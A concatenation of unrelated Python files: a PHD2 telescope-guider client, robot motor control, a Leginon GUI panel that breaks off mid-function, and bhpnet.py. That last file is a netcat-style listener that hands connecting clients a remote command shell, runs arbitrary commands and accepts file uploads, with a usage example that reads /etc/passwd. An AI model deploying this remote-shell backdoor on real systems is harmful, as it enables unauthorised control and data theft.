This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
|
guider.py
|
import copy
import json
import math
import selectors
import socket
import threading
import time
class SettleProgress:
"""Info related to progress of settling after guiding starts or after
a dither
"""
def __init__(self):
self.Done = False
self.Distance = 0.0
self.SettlePx = 0.0
self.Time = 0.0
self.SettleTime = 0.0
self.Status = 0
self.Error = ''
class GuideStats:
"""cumulative guide stats since guiding started and settling
completed
"""
def __init__(self):
self.rms_tot = 0.0
self.rms_ra = 0.0
self.rms_dec = 0.0
self.peak_ra = 0.0
self.peak_dec = 0.0
class GuiderException(Exception):
"""GuiderException is the base class for any excettions raied by the
Guider methods
"""
pass
class _Accum:
def __init__(self):
self.Reset()
def Reset(self):
self.n = 0
self.a = self.q = self.peak = 0
def Add(self, x):
ax = abs(x)
if ax > self.peak:
self.peak = ax
self.n += 1
d = x - self.a
self.a += d / self.n
self.q += (x - self.a) * d
def Mean(self):
return self.a
def Stdev(self):
return math.sqrt(self.q / self.n) if self.n >= 1 else 0.0
def Peak(self):
return self.peak
class _Conn:
def __init__(self):
self.lines = []
self.buf = b''
self.sock = None
self.sel = None
self.terminate = False
def __del__(self):
self.Disconnect()
def Connect(self, hostname, port):
self.sock = socket.socket()
try:
self.sock.connect((hostname, port))
self.sock.setblocking(False) # non-blocking
self.sel = selectors.DefaultSelector()
self.sel.register(self.sock, selectors.EVENT_READ)
except Exception:
self.sel = None
self.sock = None
raise
def Disconnect(self):
if self.sel is not None:
self.sel.unregister(self.sock)
self.sel = None
if self.sock is not None:
self.sock.close()
self.sock = None
def IsConnected(self):
return self.sock is not None
def ReadLine(self):
#print(f"DBG: ReadLine enter lines:{len(self.lines)}")
while not self.lines:
#print("DBG: begin wait")
while True:
if self.terminate:
return ''
events = self.sel.select(0.5)
if events:
break
#print("DBG: call recv")
s = self.sock.recv(4096)
#print(f"DBG: recvd: {len(s)}: {s}")
i0 = 0
i = i0
while i < len(s):
if s[i] == b'\r'[0] or s[i] == b'\n'[0]:
self.buf += s[i0 : i]
if self.buf:
self.lines.append(self.buf)
self.buf = b''
i += 1
i0 = i
else:
i += 1
self.buf += s[i0 : i]
return self.lines.pop(0)
def WriteLine(self, s):
b = s.encode()
totsent = 0
while totsent < len(b):
sent = self.sock.send(b[totsent:])
if sent == 0:
raise RuntimeError("socket connection broken")
totsent += sent
def Terminate(self):
self.terminate = True
class Guider:
"""The main class for interacting with PHD2"""
DEFAULT_STOPCAPTURE_TIMEOUT = 10
def __init__(self, hostname = "localhost", instance = 1):
self.hostname = hostname
self.instance = instance
self.conn = None
self.terminate = False
self.worker = None
self.lock = threading.Lock()
self.cond = threading.Condition()
self.response = None
self.AppState = ''
self.AvgDist = 0
self.Version = ''
self.PHDSubver = ''
self.accum_active = False
self.settle_px = 0
self.accum_ra = _Accum()
self.accum_dec = _Accum()
self.Stats = GuideStats()
self.Settle = None
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.Disconnect()
@staticmethod
def _is_guiding(st):
return st == "Guiding" or st == "LostLock"
@staticmethod
def _accum_get_stats(ra, dec):
stats = GuideStats()
stats.rms_ra = ra.Stdev()
stats.rms_dec = dec.Stdev()
stats.peak_ra = ra.Peak()
stats.peak_dec = dec.Peak()
return stats
def _handle_event(self, ev):
e = ev["Event"]
if e == "AppState":
with self.lock:
self.AppState = ev["State"]
if self._is_guiding(self.AppState):
self.AvgDist = 0 # until we get a GuideStep event
elif e == "Version":
with self.lock:
self.Version = ev["PHDVersion"]
self.PHDSubver = ev["PHDSubver"]
elif e == "StartGuiding":
self.accum_active = True
self.accum_ra.Reset()
self.accum_dec.Reset()
stats = self._accum_get_stats(self.accum_ra, self.accum_dec)
with self.lock:
self.Stats = stats
elif e == "GuideStep":
if self.accum_active:
self.accum_ra.Add(ev["RADistanceRaw"])
self.accum_dec.Add(ev["DECDistanceRaw"])
stats = self._accum_get_stats(self.accum_ra, self.accum_dec)
with self.lock:
self.AppState = "Guiding"
self.AvgDist = ev["AvgDist"]
if self.accum_active:
self.Stats = stats
elif e == "SettleBegin":
self.accum_active = False # exclude GuideStep messages from stats while settling
elif e == "Settling":
s = SettleProgress()
s.Done = False
s.Distance = ev["Distance"]
s.SettlePx = self.settle_px
s.Time = ev["Time"]
s.SettleTime = ev["SettleTime"]
s.Status = 0
with self.lock:
self.Settle = s
elif e == "SettleDone":
self.accum_active = True
self.accum_ra.Reset()
self.accum_dec.Reset()
stats = self._accum_get_stats(self.accum_ra, self.accum_dec)
s = SettleProgress()
s.Done = True
s.Status = ev["Status"]
s.Error = ev.get("Error")
with self.lock:
self.Settle = s
self.Stats = stats
elif e == "Paused":
with self.lock:
self.AppState = "Paused"
elif e == "StartCalibration":
with self.lock:
self.AppState = "Calibrating"
elif e == "LoopingExposures":
with self.lock:
self.AppState = "Looping"
elif e == "LoopingExposuresStopped" or e == "GuidingStopped":
with self.lock:
self.AppState = "Stopped"
elif e == "StarLost":
with self.lock:
self.AppState = "LostLock"
self.AvgDist = ev["AvgDist"]
else:
#print(f"DBG: todo: handle event {e}")
pass
def _worker(self):
while not self.terminate:
line = self.conn.ReadLine()
#print(f"DBG: L: {line}")
if not line:
if not self.terminate:
# server disconnected
#print("DBG: server disconnected")
pass
break
try:
j = json.loads(line)
except json.JSONDecodeError:
# ignore invalid json
#print("DBG: ignoring invalid json response")
continue
if "jsonrpc" in j:
# a response
#print(f"DBG: R: {line}\n")
with self.cond:
self.response = j
self.cond.notify()
else:
self._handle_event(j)
def Connect(self):
"""connect to PHD2 -- call Connect before calling any of the server API methods below"""
self.Disconnect()
try:
self.conn = _Conn()
self.conn.Connect(self.hostname, 4400 + self.instance - 1)
self.terminate = False
self.worker = threading.Thread(target=self._worker)
self.worker.start()
#print("DBG: connect done")
except Exception:
self.Disconnect()
raise
def Disconnect(self):
"""disconnect from PHD2"""
if self.worker is not None:
if self.worker.is_alive():
#print("DBG: terminating worker")
self.terminate = True
self.conn.Terminate()
#print("DBG: joining worker")
self.worker.join()
self.worker = None
if self.conn is not None:
self.conn.Disconnect()
self.conn = None
#print("DBG: disconnect done")
@staticmethod
def _make_jsonrpc(method, params):
req = {
"method": method,
"id": 1
}
if params is not None:
if isinstance(params, (list, dict)):
req["params"] = params
else:
# single non-null parameter
req["params"] = [ params ]
return json.dumps(req,separators=(',', ':'))
@staticmethod
def _failed(res):
return "error" in res
def Call(self, method, params = None):
"""this function can be used for raw JSONRPC method
invocation. Generally you won't need to use this as it is much
more convenient to use the higher-level methods below
"""
s = self._make_jsonrpc(method, params)
#print(f"DBG: Call: {s}")
# send request
self.conn.WriteLine(s + "\r\n")
# wait for response
with self.cond:
while not self.response:
self.cond.wait()
response = self.response
self.response = None
if self._failed(response):
raise GuiderException(response["error"]["message"])
return response
def _CheckConnected(self):
if not self.conn.IsConnected():
raise GuiderException("PHD2 Server disconnected")
def Guide(self, settlePixels, settleTime, settleTimeout):
"""Start guiding with the given settling parameters. PHD2 takes care
of looping exposures, guide star selection, and settling. Call
CheckSettling() periodically to see when settling is complete.
"""
self._CheckConnected()
s = SettleProgress()
s.Done = False
s.Distance = 0
s.SettlePx = settlePixels
s.Time = 0
s.SettleTime = settleTime
s.Status = 0
with self.lock:
if self.Settle and not self.Settle.Done:
raise GuiderException("cannot guide while settling")
self.Settle = s
try:
self.Call(
"guide",
[
{
"pixels" : settlePixels,
"time": settleTime,
"timeout": settleTimeout,
},
False, # don't force calibration
]
)
self.settle_px = settlePixels
except Exception:
with self.lock:
self.Settle = None
raise
def Dither(self, ditherPixels, settlePixels, settleTime, settleTimeout):
"""Dither guiding with the given dither amount and settling parameters. Call CheckSettling()
periodically to see when settling is complete.
"""
self._CheckConnected()
s = SettleProgress()
s.Done = False
s.Distance = ditherPixels
s.SettlePx = settlePixels
s.Time = 0
s.SettleTime = settleTime
s.Status = 0
with self.lock:
if self.Settle and not self.Settle.Done:
raise GuiderException("cannot dither while settling")
self.Settle = s
try:
self.Call(
"dither",
[
ditherPixels,
False,
{
"pixels" : settlePixels,
"time": settleTime,
"timeout": settleTimeout,
},
]
)
self.settle_px = settlePixels
except Exception:
with self.lock:
self.Settle = None
raise
def IsSettling(self):
"""Check if phd2 is currently in the process of settling after a Guide
or Dither"""
self._CheckConnected()
with self.lock:
if self.Settle:
return True
# for app init, initialize the settle state to a consistent
# value as if Guide had been called
res = self.Call("get_settling")
val = res["result"]
if val:
s = SettleProgress()
s.Done = False
s.Distance = -1.0
s.SettlePx = 0.0
s.Time = 0.0
s.SettleTime = 0.0
s.Status = 0
with self.lock:
if self.Settle is None:
self.Settle = s
return val
def CheckSettling(self):
"""Get the progress of settling"""
self._CheckConnected()
ret = SettleProgress()
with self.lock:
if not self.Settle:
raise GuiderException("not settling")
if self.Settle.Done:
# settle is done
ret.Done = True
ret.Status = self.Settle.Status
ret.Error = self.Settle.Error
self.Settle = None
else:
# settle in progress
ret.Done = False
ret.Distance = self.Settle.Distance
ret.SettlePx = self.settle_px
ret.Time = self.Settle.Time
ret.SettleTime = self.Settle.SettleTime
return ret
def GetStats(self):
"""Get the guider statistics since guiding started. Frames captured
while settling is in progress are excluded from the stats.
"""
self._CheckConnected()
with self.lock:
stats = copy.copy(self.Stats)
stats.rms_tot = math.hypot(stats.rms_ra, stats.rms_dec)
return stats
def StopCapture(self, timeoutSeconds = 10):
"""stop looping and guiding"""
self.Call("stop_capture")
for i in range(0, timeoutSeconds):
with self.lock:
if self.AppState == "Stopped":
return
time.sleep(1)
self._CheckConnected()
# hack! workaround bug where PHD2 sends a GuideStep after stop
# request and fails to send GuidingStopped
res = self.Call("get_app_state")
st = res["result"]
with self.lock:
self.AppState = st
if st == "Stopped":
return
# end workaround
raise GuiderException(f"guider did not stop capture after {timeoutSeconds} seconds!")
def Loop(self, timeoutSeconds = 10):
"""start looping exposures"""
self._CheckConnected()
# already looping?
with self.lock:
if self.AppState == "Looping":
return
res = self.Call("get_exposure")
exp = res["result"]
self.Call("loop")
time.sleep(exp)
for i in range(0, timeoutSeconds):
with self.lock:
if self.AppState == "Looping":
return
time.sleep(1)
self._CheckConnected()
raise GuiderException("timed-out waiting for guiding to start looping")
def PixelScale(self):
"""get the guider pixel scale in arc-seconds per pixel"""
res = self.Call("get_pixel_scale")
return res["result"]
def GetEquipmentProfiles(self):
"""get a list of the Equipment Profile names"""
res = self.Call("get_profiles")
profiles = []
for p in res["result"]:
profiles.append(p["name"])
return profiles
def ConnectEquipment(self, profileName):
"""connect the equipment in an equipment profile"""
res = self.Call("get_profile")
prof = res["result"]
if prof["name"] != profileName:
res = self.Call("get_profiles")
profiles = res["result"]
profid = -1
for p in profiles:
name = p["name"]
if name == profileName:
profid = p.get("id", -1)
break
if profid == -1:
raise GuiderException(f"invalid phd2 profile name: {profileName}")
self.StopCapture(self.DEFAULT_STOPCAPTURE_TIMEOUT)
self.Call("set_connected", False)
self.Call("set_profile", profid)
self.Call("set_connected", True)
def DisconnectEquipment(self):
"""disconnect equipment"""
self.StopCapture(self.DEFAULT_STOPCAPTURE_TIMEOUT)
self.Call("set_connected", False)
def GetStatus(self):
"""get the AppState
(https://github.com/OpenPHDGuiding/phd2/wiki/EventMonitoring#appstate)
and current guide error
"""
self._CheckConnected()
with self.lock:
return self.AppState, self.AvgDist
def IsGuiding(self):
"""check if currently guiding"""
st, dist = self.GetStatus()
return self._is_guiding(st)
def Pause(self):
"""pause guiding (looping exposures continues)"""
self.Call("set_paused", True)
def Unpause(self):
"""un-pause guiding"""
self.Call("set_paused", False)
def SaveImage(self, filename):
"""save the current guide camera frame (FITS format), returning the
name of the file in *filename. The caller will need to remove
the file when done.
"""
res = self.Call("save_image")
return res["result"]["filename"]
|
bhpnet.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 22 17:22:56 2020
@author: edoardottt
"""
import sys
import socket
import getopt
import threading
import subprocess
# define some global variables
listen = False
command = False
upload = False
execute = ""
target = ""
upload_destination = ""
port = 0
print(
"""
____ _ _ ____ _ _ _
| __ )| | | | _ \| \ | | ___| |_
| _ \| |_| | |_) | \| |/ _ \ __|
| |_) | _ | __/| |\ | __/ |_
|____/|_| |_|_| |_| \_|\___|\__|"""
)
def usage():
print("")
print("Usage: bhpnet.py -t target_host -p port")
print(
"""-l --listen - listen on [host]:[port] for
incoming connections"""
)
print(
"""-e --execute=fle_to_run - execute the given file upon
receiving a connection"""
)
print("""-c --command - initialize a command shell""")
print(
"""-u --upload=destination - upon receiving connection upload a
file and write to [destination]"""
)
print("")
print("")
print("Examples: ")
print("bhpnet.py -t 192.168.0.1 -p 5555 -l -c")
print("bhpnet.py -t 192.168.0.1 -p 5555 -l -u=C:\\target.exe")
print('bhpnet.py -t 192.168.0.1 -p 5555 -l -e="cat /etc/passwd"')
print("echo 'ABCDEFGHI' | ./bhpnet.py -t 192.168.11.12 -p 135")
sys.exit(0)
def main():
global listen
global port
global execute
global command
global upload_destination
global target
if not len(sys.argv[1:]):
usage()
# read the command line options
try:
opts, args = getopt.getopt(sys.argv[1:], "hle:t:p:cu:"), [
"help",
"listen",
"execute",
"target",
"port",
"command",
"upload",
]
except getopt.GetoptError as err:
print(str(err))
usage()
opts = opts[0]
for o, a in opts:
if o in ("-h", "--help"):
usage()
elif o in ("-l", "--listen"):
listen = True
elif o in ("-e", "--execute"):
execute = a
elif o in ("-c", "--command"):
command = True
elif o in ("-u", "--upload"):
upload_destination = a
elif o in ("-t", "--target"):
target = a
elif o in ("-p", "--port"):
port = int(a)
else:
assert False, "Unhandled Option"
# are we going to listen or just send data from stdin?
if not listen and len(target) and port > 0:
# read in the buffer from the commandline
# this will block, so send CTRL-D if not sending input
# to stdin
buffer = sys.stdin.read()
# send data off
client_sender(buffer)
# we are going to listen and potentially
# upload things, execute commands, and drop a shell back
# depending on our command line options above
if listen:
server_loop()
def server_loop():
global target
# if no target is defined, we listen on all interfaces
if not len(target):
target = "0.0.0.0"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((target, port))
server.listen(5)
while True:
client_socket, addr = server.accept()
# spin off a thread to handle out new client
client_thread = threading.Thread(target=client_handler, args=(client_socket,))
client_thread.start()
def client_sender(buffer):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# connect to our target host
client.connect((target, port))
if len(buffer):
client.send(buffer)
while True:
# now wait for data back
recv_len = 1
response = ""
while recv_len:
data = client.recv(4096)
recv_len = len(data)
response += data.decode(errors="ignore")
if recv_len < 4096:
break
print(response)
# wait for more input
buffer = input("")
buffer += "\n"
# send it off
client.send(buffer.encode())
except:
print("[*] Exception! Exiting")
# tear down the connection
client.close()
def client_handler(client_socket):
global upload
global execute
global command
# check for upload
if len(upload_destination):
# read in all of the bytes and write to out destination
file_buffer = ""
# keep reading data until none is available
while True:
data = client_socket.recv(1024)
if not data:
break
else:
file_buffer += data
# now we take these bytes and try to write them out
try:
file_descriptor = open(upload_destination, "wb")
file_descriptor.write(file_buffer)
file_descriptor.close()
# acknowledge that we wrote the file out
client_socket.send(
b"Succesfully saved file to {}\r\n".format(upload_destination)
)
except:
client_socket.send(
b"Failed to save file to {}\r\n".format(upload_destination)
)
# check for command execution
if len(execute):
# run the command
output = run_command(execute)
client_socket.send(output)
# now we go into another loop if a command shell was requested
if command:
while True:
# show a simple prompt
client_socket.send(b"<BHP:#> ")
# now we receive until we see a linefeed (enter key)
cmd_buffer = b""
while b"\n" not in cmd_buffer:
cmd_buffer += client_socket.recv(1024)
# send back the command output
response = run_command(cmd_buffer)
# send back the response
client_socket.send(response)
def run_command(command):
# trim the newline
command = command.rstrip()
# run the command and get the output back
try:
output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
except:
output = "Failed to execute command.\r\n"
# send the output back to th client
return output
main()
|
tcp_server.py
|
#! /data/sever/python/bin/python
# -*- coding:utf-8 -*-
"""
@author: 'root'
@date: '3/2/16'
"""
__author__ = 'root'
import socket
import threading
bind_ip = "0.0.0.0"
bind_port = 9999
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))
server.listen(5)
print "Listen:%s" % ((bind_ip, bind_port),)
def handle_client(client_socket):
request = client_socket.recv(1024)
print "Recv:%s" % request
client_socket.send("ACK!")
client_socket.close()
while True:
client, addr = server.accept()
print client, addr
client_handler = threading.Thread(target=handle_client, args=(client,))
client_handler.start()
|
motor_lib.py
|
import re
import enum
import time
from threading import Thread
from roboclaw import Roboclaw
import maestro
DEFAULT_TIME_TO_DELAY_MOTOR = 0.02 # 20 milliseconds
MAX_MOTOR_SPEED = 100 # max speed from client
MAX_MOTOR_POWER = 120 # max power to bucket motor controller
MAX_DRIVE_MOTOR_RPM = 4000 # max rpm for to drive motor controllers
motorMessageRegex = re.compile('([\w])([-]*[\d]+)\|')
servoTTYAddressRegex = re.compile('/dev/ttyACM([\d]+)')
class SubMessagePrefix(enum.Enum):
LEFT_MOTOR = 'l'
RIGHT_MOTOR = 'r'
ACTUATOR = 'a'
BUCKET = 'b'
SERVO = 's'
class RoboclawStatus(enum.Enum):
CONNECTED = 'Roboclaw Connected'
DISCONNECTED = 'Roboclaw Disconnected'
"""
To set /dev/roboclaw using udev rules, follow thise guide:
https://www.linux.com/learn/build-road-raspberry-pi-robot-part-2
"""
class MotorConnection:
def __init__(self, roboclaw_port='/dev/roboclaw',
baud_rate=115200,
left_drive_address=0x82, right_drive_address=0x83,
actuator_address=0x80, dig_address=0x83, conveyorAddress=0x81):
self.roboclaw = Roboclaw(roboclaw_port, baud_rate)
if self.roboclaw.Open():
self.status = RoboclawStatus.CONNECTED
else:
self.status = RoboclawStatus.DISCONNECTED
print(self.status)
print('MotorConnection initialized.')
self.left_drive_address = left_drive_address
self.right_drive_address = right_drive_address
self.actuator_address = actuator_address
self.dig_address = dig_address
self.conveyorAddress = conveyorAddress
self.bucketAddress = 0x81
self.left_motor_speed = 0
self.right_motor_speed = 0
self.actuator_motor_speed = 0
self.bucket_motor_speed = 0
self.camera_actuator_speed = 0
self.camera_servo_speed = 0
@staticmethod
def direction_of_speed(speed):
if speed >= 0:
return 1
else:
return -1
def are_speed_directions_equal(self, speed1, speed2):
if self.direction_of_speed(speed1) is self.direction_of_speed(speed2):
return True
else:
return False
@staticmethod
def convert_speed_to_power(speed):
if abs(speed) > MAX_MOTOR_SPEED:
return 0
else:
power_percentage = float(speed) / float(MAX_MOTOR_SPEED)
power = int(power_percentage * float(MAX_MOTOR_POWER))
return power
@staticmethod
def convert_speed_to_rpm(speed):
if abs(speed) > MAX_MOTOR_SPEED:
return 0
else:
power_percentage = float(speed) / float(MAX_MOTOR_SPEED)
power = int(power_percentage * float(MAX_DRIVE_MOTOR_RPM))
return power
def left_drive(self, speed):
if not self.are_speed_directions_equal(speed, self.left_motor_speed):
print('Left motor speed changed direction.')
self.roboclaw.ForwardM2(self.left_drive_address, 0)
time.sleep(DEFAULT_TIME_TO_DELAY_MOTOR)
print('Left motor at speed:', speed, '%')
self.left_motor_speed = speed
power = self.convert_speed_to_power(speed)
print('Left motor at power:', power)
if power >= 0:
self.roboclaw.BackwardM2(self.left_drive_address, power)
self.roboclaw.BackwardM1(self.left_drive_address, power)
else:
self.roboclaw.ForwardM2(self.left_drive_address, abs(power))
self.roboclaw.ForwardM1(self.left_drive_address, abs(power))
def right_drive(self, speed):
if not self.are_speed_directions_equal(speed, self.right_motor_speed):
print('Left motor speed changed direction.')
self.roboclaw.ForwardM1(self.right_drive_address, 0)
self.roboclaw.ForwardM2(self.right_drive_address, 0)
time.sleep(DEFAULT_TIME_TO_DELAY_MOTOR)
print('Right motor at speed:', speed, '%')
self.right_motor_speed = speed
power = self.convert_speed_to_power(speed)
print('Right motor at power:', power)
if power >= 0:
self.roboclaw.BackwardM1(self.right_drive_address, power)
self.roboclaw.BackwardM2(self.right_drive_address, power)
else:
self.roboclaw.ForwardM1(self.right_drive_address, abs(power))
self.roboclaw.ForwardM2(self.right_drive_address, abs(power))
def camera_actuate(self, speed):
pass
def camera_rotate(self, speed):
pass
def bucket_actuate(self, speed):
if not self.are_speed_directions_equal(speed, self.actuator_motor_speed):
print('Actuator motor speed changed direction.')
self.roboclaw.ForwardM1(self.bucketAddress, 0)
time.sleep(DEFAULT_TIME_TO_DELAY_MOTOR)
print('Actuator motor at speed:', speed, '%')
self.actuator_motor_speed = speed
power = self.convert_speed_to_power(speed)
print('Actuator motor at power:', power)
if power >= 0:
self.roboclaw.BackwardM1(self.bucketAddress, power)
else:
self.roboclaw.ForwardM1(self.bucketAddress, abs(power))
def bucket_rotate(self, speed):
if not self.are_speed_directions_equal(speed, self.bucket_motor_speed):
print('Bucket motor speed changed direction.')
self.roboclaw.ForwardM1(self.bucketAddress, 0)
time.sleep(DEFAULT_TIME_TO_DELAY_MOTOR)
print('Bucket motor at speed:', speed, '%')
self.bucket_motor_speed = speed
power = self.convert_speed_to_power(speed)
print('Bucket motor at power:', power)
if power >= 0:
self.roboclaw.BackwardM1(self.bucketAddress, power)
else:
self.roboclaw.ForwardM1(self.bucketAddress, abs(power))
def conveyor_rotate(self, speed):
#Change direction code missing
speed_conveyor=speed
power=self.convert_speed_to_power(speed)
self.roboclaw.ForwardM1(self.conveyorAddress, abs(power))
# motor1=self.roboclaw.ReadEncM1(0x83)
# print(motor1)
# self.roboclaw.SpeedM1(0x83, 8)
def parse_message(self, message):
sub_messages = motorMessageRegex.findall(message)
threads = []
for sub_message in sub_messages:
motor_prefix = sub_message[0]
speed = int(sub_message[1])
try:
if motor_prefix == SubMessagePrefix.LEFT_MOTOR:
left_motor_thread = Thread(name='leftMotorThread',
target=self.left_drive(-speed))
threads.append(left_motor_thread)
left_motor_thread.start()
elif motor_prefix == SubMessagePrefix.RIGHT_MOTOR:
right_motor_thread = Thread(name='rightMotorThread',
target=self.right_drive(speed))
threads.append(right_motor_thread)
right_motor_thread.start()
elif motor_prefix == SubMessagePrefix.ACTUATOR:
actuator_thread = Thread(name='actuatorThread',
target=self.bucket_actuate(speed))
threads.append(actuator_thread)
actuator_thread.start()
elif motor_prefix == SubMessagePrefix.BUCKET:
bucket_thread = Thread(name='bucketThread',
target=self.bucket_rotate(speed))
threads.append(bucket_thread)
bucket_thread.start()
else:
print('MotorPrefix "', motor_prefix, '" unrecognized.')
except AttributeError:
self.status = RoboclawStatus.DISCONNECTED
print('Roboclaw disconnected...retrying connection')
if self.roboclaw.Open():
print('Roboclaw connected...retrying command')
self.status = RoboclawStatus.CONNECTED
#self.parse_message(message)
for thread in threads:
thread.join()
def close(self):
print('Closed connection:', self.roboclaw.Close())
|
MosaicTargetMaker.py
|
# The Leginon software is Copyright 2004
# The Scripps Research Institute, La Jolla, CA
# For terms of the license agreement
# see http://ami.scripps.edu/software/leginon-license
#
import re
import threading
import wx
from leginon.gui.wx.Entry import Entry, FloatEntry, IntEntry
import leginon.gui.wx.Node
from leginon.gui.wx.Presets import PresetChoice
from leginon.gui.wx.Choice import Choice
import leginon.gui.wx.Settings
import leginon.gui.wx.ToolBar
import leginon.gui.wx.Events
class Panel(leginon.gui.wx.Node.Panel):
icon = 'atlasmaker'
def __init__(self, *args, **kwargs):
leginon.gui.wx.Node.Panel.__init__(self, *args, **kwargs)
self.toolbar.AddTool(leginon.gui.wx.ToolBar.ID_SETTINGS,
'settings',
shortHelpString='Settings')
self.toolbar.AddSeparator()
self.toolbar.AddTool(leginon.gui.wx.ToolBar.ID_CALCULATE,
'calculate',
shortHelpString='Calculate Atlas')
self.toolbar.AddTool(leginon.gui.wx.ToolBar.ID_PLAY,
'play',
shortHelpString='Publish Atlas')
self.toolbar.EnableTool(leginon.gui.wx.ToolBar.ID_PLAY, False)
self.szmain.AddGrowableCol(0)
self.SetSizer(self.szmain)
self.SetAutoLayout(True)
self.SetupScrolling()
self.Bind(leginon.gui.wx.Events.EVT_ATLAS_CALCULATED, self.onAtlasCalculated)
self.Bind(leginon.gui.wx.Events.EVT_ATLAS_PUBLISHED, self.onAtlasPublished)
def onNodeInitialized(self):
self.toolbar.Bind(wx.EVT_TOOL, self.onSettingsTool,
id=leginon.gui.wx.ToolBar.ID_SETTINGS)
self.toolbar.Bind(wx.EVT_TOOL, self.onCalculateAtlasTool,
id=leginon.gui.wx.ToolBar.ID_CALCULATE)
self.toolbar.Bind(wx.EVT_TOOL, self.onPublishAtlasTool,
id=leginon.gui.wx.ToolBar.ID_PLAY)
def onSettingsTool(self, evt):
dialog = SettingsDialog(self, show_basic=True)
dialog.ShowModal()
dialog.Destroy()
def onAtlasCalculated(self, evt):
self.toolbar.Enable(True)
if self.node.publishargs:
self.toolbar.EnableTool(leginon.gui.wx.ToolBar.ID_PLAY, True)
else:
self.toolbar.EnableTool(leginon.gui.wx.ToolBar.ID_PLAY, False)
def onAtlasPublished(self, evt):
self.toolbar.Enable(True)
def onCalculateAtlasTool(self, evt):
self.toolbar.Enable(False)
threading.Thread(target=self.node.calculateAtlas).start()
def onPublishAtlasTool(self, evt):
self.toolbar.Enable(False)
threading.Thread(target=self.node.publishAtlas).start()
def atlasCalculated(self):
evt = leginon.gui.wx.Events.AtlasCalculatedEvent()
self.GetEventHandler().AddPendingEvent(evt)
def atlasPublished(self):
evt = leginon.gui.wx.Events.AtlasPublishedEvent()
self.GetEventHandler().AddPendingEvent(evt)
class SettingsDialog(leginon.gui.wx.Settings.Dialog):
def initialize(self):
return ScrolledSettings(self,self.scrsize,False,self.show_basic)
class ScrolledSettings(leginon.gui.wx.Settings.ScrolledDialog):
def initialize(self):
leginon.gui.wx.Settings.ScrolledDialog.initialize(self)
sb = wx.StaticBox(self, -1, 'Image Acquisition')
sbsz = wx.StaticBoxSizer(sb, wx.VERTICAL)
if self.show_basic:
sz = self.addBasicSettings()
else:
sz = self.addSettings()
sbsz.Add(sz, 0, wx.ALIGN_CENTER|wx.EXPAND|wx.ALL, 5)
return [sbsz]
return ScrolledSettings(self,self.scrsize,False)
def addBasicSettings(self):
sz = wx.GridBagSizer(5, 10)
# preset
presets = self.node.presetsclient.getPresetNames()
self.widgets['preset'] = PresetChoice(self, -1)
self.widgets['preset'].setChoices(presets)
label = wx.StaticText(self, -1, 'Preset:')
sz.Add(label, (0, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz.Add(self.widgets['preset'], (0, 1), (1, 1),
wx.ALIGN_CENTER_VERTICAL|wx.EXPAND)
# atlas label
self.widgets['label'] = Entry(self, -1, allowspaces=False)
label = wx.StaticText(self, -1, 'Label:')
sz.Add(label, (1, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz.Add(self.widgets['label'], (1, 1), (1, 1),
wx.ALIGN_CENTER_VERTICAL|wx.EXPAND)
# radius
self.widgets['radius'] = FloatEntry(self, -1, min=0.0, chars=6)
label = wx.StaticText(self, -1, 'Radius:')
sz.Add(label, (2, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
#sz.Add(szradius, (2, 1), (1, 1), wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
sz.Add(self.widgets['radius'], (2, 1), (1, 1),
wx.ALIGN_CENTER_VERTICAL|wx.FIXED_MINSIZE|wx.ALIGN_RIGHT)
label = wx.StaticText(self, -1, 'm')
sz.Add(label, (2, 2), (1, 1), wx.ALIGN_CENTER_VERTICAL)
'''
# atlas max size
self.widgets['max size'] = IntEntry(self, -1)
label = wx.StaticText(self, -1, 'Max size:')
sz.Add(label, (3, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz.Add(self.widgets['max size'], (3, 1), (1, 1),
wx.ALIGN_CENTER_VERTICAL|wx.EXPAND)
# atlas max size
self.widgets['max targets'] = IntEntry(self, -1)
label = wx.StaticText(self, -1, 'Max targets:')
sz.Add(label, (4, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz.Add(self.widgets['max targets'], (4, 1), (1, 1),
wx.ALIGN_CENTER_VERTICAL|wx.EXPAND)
'''
return sz
def addSettings(self):
presets = self.node.presetsclient.getPresetNames()
self.widgets['preset'] = PresetChoice(self, -1)
self.widgets['preset'].setChoices(presets)
self.widgets['label'] = Entry(self, -1, allowspaces=False)
self.widgets['radius'] = FloatEntry(self, -1, min=0.0, chars=6)
self.widgets['max size'] = IntEntry(self, -1, chars=6)
self.widgets['max targets'] = IntEntry(self, -1, chars=6)
self.widgets['overlap'] = FloatEntry(self, -1, max=100.0, chars=6)
self.widgets['mosaic center'] = Choice(self, -1, choices=['stage center', 'current position'])
self.widgets['ignore request'] = wx.CheckBox(self, -1, 'Ignore Request to Make Targets from Others')
#szradius = wx.GridBagSizer(5, 5)
#szradius.Add(self.widgets['radius'], (0, 0), (1, 1),
# wx.ALIGN_CENTER_VERTICAL|wx.FIXED_MINSIZE)
#label = wx.StaticText(self, -1, 'meters')
#szradius.Add(label, (0, 1), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz = wx.GridBagSizer(5, 10)
label = wx.StaticText(self, -1, 'Preset:')
sz.Add(label, (0, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz.Add(self.widgets['preset'], (0, 1), (1, 1),
wx.ALIGN_CENTER_VERTICAL|wx.EXPAND)
label = wx.StaticText(self, -1, 'Label:')
sz.Add(label, (1, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz.Add(self.widgets['label'], (1, 1), (1, 1),
wx.ALIGN_CENTER_VERTICAL|wx.EXPAND)
label = wx.StaticText(self, -1, 'Radius:')
sz.Add(label, (2, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
